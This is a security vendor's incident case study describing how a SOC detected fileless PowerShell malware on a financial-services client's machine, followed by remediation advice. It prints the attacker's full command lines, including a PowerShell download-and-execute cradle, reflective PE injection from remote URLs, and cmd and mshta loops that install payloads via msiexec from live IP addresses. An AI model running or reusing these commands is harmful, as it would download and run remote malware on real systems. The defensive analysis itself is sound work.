PowerShell Threat Neutralized by MSP of Financial Client

The Network: A well-known Managed Service Provider (MSP) uses Netsurion’s EventTracker solution to provide SOC-as-a-Service (SOCaaS) to their end clients. The impacted end client is in the financial services industry with personally identifiable information (PII) and sensitive data to protect for 300 employees and their devices.

The Expectation: Preventative defenses such as anti-virus (AV) are working. Comprehensive alerting with detection and response provides advanced cybersecurity, even against stealthy file-less malware. Rapid managed threat protection mitigates threats and minimizes damage.

The Catch: The EventTracker SOC (Security Operations Center) detected malware that leveraged Microsoft’s PowerShell script to download and install file-less malware, commonly-used adversary techniques to bypass anti-virus (AV) software.

The Find: Netsurion’s SOC analyst used the advanced logic in the EventTracker managed threat protection platform to detect a suspicious command with cmd.exe invoking PowerShell to download a suspicious file. PowerShell’s malicious use is often not detected or stopped by traditional endpoint defenses, as files and commands are not written to disk. The SOC actively investigates for suspicious use of well-known attack vectors such as PowerShell, a common sys admin tool.

Command Line:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://rawcdn.githack.com/28308/256/ 388472586c8aed167752f6174e7de42660b68551/Sqlexec/pe.jpg');Invoke-ReflectivePEInjection -PEUrl http://rawcdn.githack.com/28308/256/388472586c8aed167752f6174e7de42660b68551/Sqlexec/1603232.jpg -ExeArgs '\"Cmd /c for /d %i in (45.76.32.126:11946 158.247.198.237:17607 222.184.122.3:19028) do Msiexec /i http://%i/785AD053.moe /Q\"' -ForceA"

The attacker then tried to evade detection using:

Command Parameter Description
powershell.exe Adversaries can use PowerShell to perform actions such as information discovery and code execution. MITRE ATT&CK ID T1086.
-nop No Profile
-exec bypass -c Execution Bypass - Command
-IEX Invoke Expression
New-Object Net.WebClient).DownloadString Downloads the requested resource specified as URL
hxxp://rawcdn.githack.com/28308/256/388472586c8aed
167752f6174e7de42660b68551/Sqlexec/pe.jpg
URL from where the strings are to be downloaded
Invoke-ReflectivePEInjection Command can load a DLL/EXE into the PowerShell process and execute the DLL/EXE into memory without writing any files to disk.
-PEUrl hxxp://rawcdn.githack.com/28308/256/388472586c8aed
167752f6174e7de42660b68551/Sqlexec/1603232.jpg
Portable Executable from URL
-ExeArgs Arguments to pass to the executable being loaded in memory
Cmd /c Carries out the command specified by string and then stops in command prompt
for /d %i in (45.76.32.126:11946 158.247.198.237:17607 222.184.122.3:19028) do Msiexec /i http://%i/785AD053.moe /Q\ Usage of For command in command prompt in standard syntax for <drive> {%% | %}<variable> in (<set>) do <command> [<commandlineoptions>]
Observation: The EventTracker SOC investigation uncovers suspicious behavior that installed the downloaded file using various techniques- Through CMD directly, CMD directly mshat.exe, and at last cmd.exe invoking Microsoft’s PowerShell.

"C:\Windows\System32\cmd.exe" /c for /d %i in (45.76.32.126:11946 158.247.198.237:17607 222.184.122.3:19028) do Msiexec /i http://%i/785AD053.moe /Q

"C:\Windows\system32\cmd.exe" /c mshta vbscript:createobject("wscript.shell").run("Cmd /c for /d %i in (45.76.32.126:11946 158.247.198.237:17607 222.184.122.3:19028) do Msiexec /i http://%i/785AD053.moe /Q",0)(window.close)

Additionally: The EventTracker SOC observed that many IP addresses with poor reputation were making an inbound connection to the machine on ports 1433 and 3389, which is the well-known port for Remote Desktop Protocol or RDP.

The Fix: The EventTracker SOC provided remediation guidance for the MSP to share with their end-user client regarding the compromise. The SOC analyst continued to monitor the network for further infection. We recommend the following countermeasures to protect the MSP, their financial services client, and the extended supply chain:

  • Use PowerShell v5 or higher that provides improved usability, control, and security for this ubiquitous admin tool. Also, limit access and use of PowerShell to those with a “need to use” and monitored level of admin privileges.
  • Apply Microsoft patches as quickly as feasible as cyber criminals are actively targeting users of this pervasive technology.
  • Implement network segmentation to limit the “blast radius” of any potential attack.
  • Restrict access to known or certain IP addresses that are linked to business requirements for the ports 1433, 3389.
  • Isolate impacted systems and re-image devices to protect against further compromise.
  • Monitor the attack surface with a 24/7/365 SOC as people, process, and technology are all needed to reduce cyber risk and detect advanced threats; technology alone is not sufficient.

The Lesson: With the rise of remote work, the use of RDP as a target vector has increased 768%. The immediate need would be to enhance the alert matching rules to detect the advanced PowerShell commands that are used to evade security tools in the environment. Comprehensive 24/7/365 monitoring and managed threat protection is critical for comprehensive visibility and detection.